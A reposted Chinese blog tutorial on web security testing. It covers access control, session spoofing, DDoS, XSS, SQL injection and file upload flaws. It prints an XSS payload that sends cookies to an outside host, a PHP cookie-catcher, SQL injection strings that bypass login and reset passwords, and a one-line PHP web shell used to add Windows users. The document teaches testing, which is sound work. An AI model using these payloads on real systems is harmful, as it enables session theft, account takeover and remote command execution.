web安全性测试

最新推荐文章于 2024-07-26 17:57:56 发布
最新推荐文章于 2024-07-26 17:57:56 发布
阅读量137 收藏
点赞数
文章标签: php 数据库 操作系统
原文链接:https://my.oschina.net/bysu/blog/784578
版权

为什么80%的码农都做不了架构师?>>>   hot3.png

1.认证和授权

测试有没不经过登录就可以访问的页面

2.session和cookies欺骗

不保存重要的信息,作用域:每个项目单独存放cookies

3.ddos攻击

a.肉鸡

b.攻击联盟

c.建立tcp连接的规则,虚假ip

4.xss跨站攻击

定义:是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。

譬如在某文本框输入<input type="button" value="点我"  οnclick="alter('你好')"/>

譬如,获取当前登录用户的cookies。<img src="xxxx.jpg" οnclick="alter(document.cookies)"/>     

==================================================================================

获取到当前用户的cookies并发送到指定的网址。

1.伪装一个图片链接<img src="xxxx.jpg" οnclick="location.href='http://192.168.201.135/input.php?getCookies'document.cookies='+document.cookies"/>

2.在主机192.168.201.135网站默认目录创建一个input.php文件。代码如下:

<?php
$cookiesValue = $_GET['cookies'];
$file = fopen("c:\catchCookies","a");
fwrite($file,$cookiesValue);
fclose($file);
?>

 

5.sql注入

a.利用SQL注入登录Agileone

select username,password from user where username=$_GET['xx'] and password=$_GET['xx']

 

x'or userid=1 #'

select username,password from user where username='x' or userid=1 #'' and password=$_GET['xx']

 

x';update user set password = '223456' where userid = 1 #'

select username,password from user where username='x';update user set password = '223456' where userid = 1 #''

先用order by num     //先测试有几列

然后and 1=2 union select 1,2,...num     //这个num要跟上一步的数字一样

再然后可以在select语句里面使用database()获取数据库名mydata

接着通过select table_name from information_schema='mydata' limit a,b获取表名。a(0开始)表示从第几条开始,b表示显示几条

再接着通过select column_name from information_columns where table_schema='learn' and table_name='user'          //获取列名

 

 

1.服务器端没有对输入长度进行验证;

2.我们需要猜测表名,列名,加密方式。

b.利用URL地址参数注入SQL

踩点:在百度上查找关键字,inurl:.php?

1.要试探是否有SQL注入的可能,先在地址后面加上单引号' 如果正常显示,那就加上 1=2,再不行,就加数据库中的order by

2.单引号是字符串分隔符

3.直接把单引号转义\'

6.文件上传漏洞

譬如:php开发的网站,可以上传php文件。php文件内容为:

<?php system($_GET['cmd']); ?>

该文件就可以随意输入命令,对系统进行操作

譬如:服务器的操作系统是window,增加一个hello用户,可以在浏览器输入url,后面加上?cmd=net user hello /add   ,该命令表示在系统中增加一个hello的用户

譬如:服务器的操作系统是window,删除一个hello用户,可以在浏览器输入url,后面加上?cmd=net user hello /del

可以使用?cmd=echo fdfdfdf >> d:\input.txt 向系统写入内容。

解决方法:

1.文件的过滤

a.过滤文件后缀名

b.通过二进制文件判断文件类型

2.修改服务器核心配置,禁用脚本引擎运行系统命令。

譬如:可以在Apache的php.ini文件中禁用相关函数disable_function = system。表示禁用system函数。

转载于:https://my.oschina.net/bysu/blog/784578

Joe?
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
软件测试WEB安全性测试
03-23
WEB软件测试WEB安全性测试由于web应用于用户直接相关,又通常需要承受长时间的大量操作,因此web项目的功能和性能都必须经过可靠的验证。这就要经过web项目的全面测试。一个完整的WEB安全体系测试可以从部署与基础...
WEB安全性测试技术
03-23
WEB安全性测试软件测试WEB安全性测试一个完整的WEB安全性测试可以从部署与基础结构、输入验证、身份验证、授权、配置管理、敏感数据、会话管理、加密。参数操作、异常管理、审核和日志记录等几个方面入手。1.安全...
WEB安全性测试用例
qq_42898754的博客
04-17 2866
安全性测试用例编写 1.某些需登录后或者只有特殊用户才能访问的页面能否通过直接访问网址进入 2.对于带参数的网址,恶意修改其参数(若为数字,则输入字母或很大的数字或特殊字符)后打开网址是否出错;是否可以非法进入某些页面。 搜索页面等url中含有关键字的,输入Html代码或者Javascript看是否在页面中显示或执行;URL地址后面随便输入一些符号,并尽量是动态参数靠后 3.检查系统运行时有否记录完整的日志 4.是否设置密码最小长度(是) 5.用户名和密码是否可以有空格和回车(不可以) 6.是否允许用户名和
Web安全性测试
showgea的博客
12-04 1万+
一、认证与授权 1、认证  即登录功能正常 2、权限  每个用户拥有正确的权限 3、避免未经授权的页面可以直接访问,通过认证和权限(Session),对每个页面有一个判断。例如在知道一个页面的绝对url地址后,该页面有个session变量叫login-in,如果login-in为False时访问该页面跳转到登录页面,为True可正常访问。 4、在手动进行安全测试时,对所有url地址在不登录...
Web安全测试工具Appscan
angely2016的博客
09-25 2468
能扫描和检测所有常见的 Web 应用安全漏洞的工具APPscan
web安全测试--基础篇
qq_64444051的博客
07-02 7836
web安全测试概念及常用工具
web平台安全测试方案
PengDQ12的博客
07-27 6450
收集测试的资料平台网页的URL,用户名以及密码(最好不是超级用户,可以测试越权),Web服务器的IP(可以提供服务器的远程登录账号,以便观察测试过程中对服务器的性能影响)。需要告知开发此次测试的时间,沟通好后才能进行安全测试,并且将测试的范围,方法和相关风险提前告知,及时做好相关数据代码、环境的备份。可以选择自定义,点击”完全扫描配置“可手动修改/自定义你的测试策略,自定义后,点击应用和确定,然后点击下一步。点击“报告”按钮,选择报告模板、报告内容、布局等内容(按照需求选择),点击“保存报告”按钮,...
web安全性测试用例
热门推荐
stacey_sz的博客
12-15 3万+
建立整体的威胁模型,测试溢出漏洞、信息泄漏、错误处理、SQL 注入、身份验证和授权错误. 1.   输入验证 客户端验证 服务器端验证(禁用脚本调试,禁用Cookies) 1.输入很大的数(如4,294,967,269),输入很小的数(负数) 2.输入超长字符,如对输入文字长度有限制,则尝试超过限制,刚好到达限制字数时有何反应 3.输入特殊字符,如:~!@#$%^&*()_+ 4.
什么是web安全测试
mengjie1016的博客
05-08 7710
1.1什么是web安全测试Web安全测试就是要提供证据表明,在面对敌意和恶意输入的时候,web系统应用仍然能够充分地满足它的需求 1.2为什么进行Web安全测试 2005年06月,CardSystems,黑客恶意侵入了它的电脑系统,窃取了4000万张信用卡的资料。 2011年12月,国内最大的开发者社区CSDN被黑客在互联网上公布了600万注册用户的数据;黑客随后陆续公布了网易、人人、天涯、猫扑等多家大型网站的数据信息。 2014年12月,大量12306用户数据被泄露,被泄露的数据达131653条,包括
安全性测试方法
yingyingyueyue的博客
11-22 3498
测试cookie是否进行了安全性方面的设置。例如secure=true,防止cookie在HTTP会话中以明文传输;httponly=true,防止JS脚本读取cookie信息,防止XSS攻击。使用新版本有助于防止基于已知漏洞的XSS工具。安全中的权限问题主要包括未授权访问和越权两大类。
web安全详解(渗透测试基础)
sunnygao的博客
11-20 2万+
文章目录一、Web基础知识1.http协议2.网络三种架构及特点3. Web应用的特点4.URL组成6.Http协议的性质7.请求响应报文的格式8.请求方法9.http缓存10.缓存新鲜度如何判断11.Http重定向原理以及状态码12.HTTPS协议 数字证书13.HTTPS协议与HTTP协议的区别?14. Web客户端的作用15.Web服务端作用16.集群环境的作用17.什么是Cookie,Cookie的作用。18.Cookie 的类型19.session的作用和原理Session的原理Session的两
web安全性测试——XSS跨站攻击
fengke1813的博客
05-29 3065
一、什么是xss跨站攻击 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 二、如何写xss脚本 ...
WEB安全性测试
03-13
Web 是指一个网站的前端页面到后端服务,比如我们常见的 Javascript、PHP、Python、Mysql、jQuery、Docker 等,包括开发、运维这些服务。...所以 Web 安全也就是从安全的角度探索 Web 的一种方式。
Web安全性测试1
08-08
Web安全性测试是确保网站及其应用程序在面临恶意攻击和未经授权访问时能够有效保护用户数据和系统安全的重要环节。以下是一些关键的知识点: 1. **权限验证**:在Web应用中,用户应经过适当的验证才能访问特定资源...
WEB安全性测试分析
03-23
注意:web安全性测试并不最终证明应用程序是安全的,而是用于验证所设立策略的有效性,这些对策是基于威胁分析阶段所做的假设而选择的。  安全性测试(securitytesting)是有关验证应用程序的安全服务和识别潜在安全...
PHP商城案例
最新发布
王世凡的技术博客
07-26 356
http://www.e9933.com/
MICA:面向复杂嵌入式系统的混合关键性部署框架
openEuler_的博客
07-23 1098
这种方式存在的问题是:硬件上需要两套系统、集成度不高,通信受限于片外物理机制的限制(如速度、时延等),软件上 Linux 和实时操作系统两者之间是割裂的,在灵活性上、可维护性上存在改进空间。在上述架构中,virtio-rpmsg 相当于网络协议中的 MAC 层,提供高效的底层通信机制,rpmsg 相当于网络协议中的传输层,提供了基于端点(endpoint)与通道(channel)抽象的通信机制,remoteproc 提供不同南向底座的生命周期管理功能,包括初始化、启动、暂停、结束等。MICA 的守护进程。
c++语言实现类似swoole扩展的项目实践
北风之神Boreas
07-24 373
项目本质其实是C++项目开发,学员学习后增加对C++技术栈的实践能力,毕竟互联网的核心基石依然是C/C++。 当你要改变以前吸收的知识来源于国内视频教程,国内文章教程 国内文章资料 转向全球老外大佬云集的github开源项目吸收时,就要学C和C++ 而你以前的IT技术就是国内的教程 国内的社区 国内的文章 ,但都是有局限的,所以要转向github社区吸收开源项目的东西来增强个人技术体系。 技术只来源于实践,不是光看,光记就会的东西,纸上得来终觉浅绝知此事要躬行。
PHP基础语法-Part2
weixin_51591328的博客
07-25 384
与其他语言相同。
Web安全性测试实战:关键漏洞与防范策略
Web安全性测试是确保网络应用系统免受未经授权的访问、恶意攻击和数据泄露的关键环节。在这个主题中,我们重点关注了几个关键的测试策略和潜在漏洞。 首先,测试人员需要检查直接输入权限受限的页面链接,比如登录...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值